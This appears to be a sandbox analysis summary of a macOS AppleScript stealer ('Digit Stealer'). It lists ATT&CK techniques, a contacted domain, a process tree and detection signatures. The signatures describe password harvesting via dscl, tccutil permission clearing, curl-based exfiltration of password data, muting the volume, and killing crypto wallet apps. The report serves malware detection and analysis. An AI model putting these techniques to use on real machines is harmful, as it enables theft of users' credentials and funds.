    Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts
    Execution: Command and Scripting Interpreter (1); AppleScript (3); At; Cron
    Persistence: Scripting (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
    Privilege Escalation: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook
    Defense Evasion: Impair Defenses (11); Indicator Blocking (1); Hidden Files and Directories (1); File Deletion (1)
    Credential Access: Unsecured Credentials (1); LSASS Memory; Security Account Manager; NTDS
    Discovery: Account Discovery (1); System Information Discovery (1); Query Registry; System Network Configuration Discovery
    Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model
    Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture
    Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (13)
    Exfiltration: Exfiltration Over Alternative Protocol (1); Exfiltration Over Web Service (1); Automated Exfiltration; Traffic Duplication
    Impact: Service Stop (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction
    Behavior Graph (ID: 5177034, Sample: payload_1_stealer.scpt, Start date: 14/01/2026, Architecture: MAC, Score: 88)
    Network: goldenticketsshop.com; h3.media.apple.map.fastly.net (146.75.123.6, port 443, SCCGOVUS, Sweden); 2 other IPs or domains
    Process tree: Terminal login -> bash -> osascript -> sh/bash children (system_profiler, md5, nohup curl, osascript, cat, unzip, killall) alongside launchd/xpcproxy-started AuthenticationServicesAgent, Notes and System Settings
    Dropped file: /Users/jess/.53210...f0b2e6abf37d5d7.txt (ASCII)
    Signatures on the graph: Yara detected Digit Stealer; Writes files containing the user's password; Uploads files by emulating a filled-in form; Clears all privacy permission grants using tccutil; Executes the "dscl" command with authonly argument (probably to verify the login password); Exfiltrates password data via HTTP using curl; Mutes the volume using AppleScript likely to hide suspicious activity from the user; Kills crypto wallet applications indicative for crypto stealers; Terminates several processes with shell command 'killall'
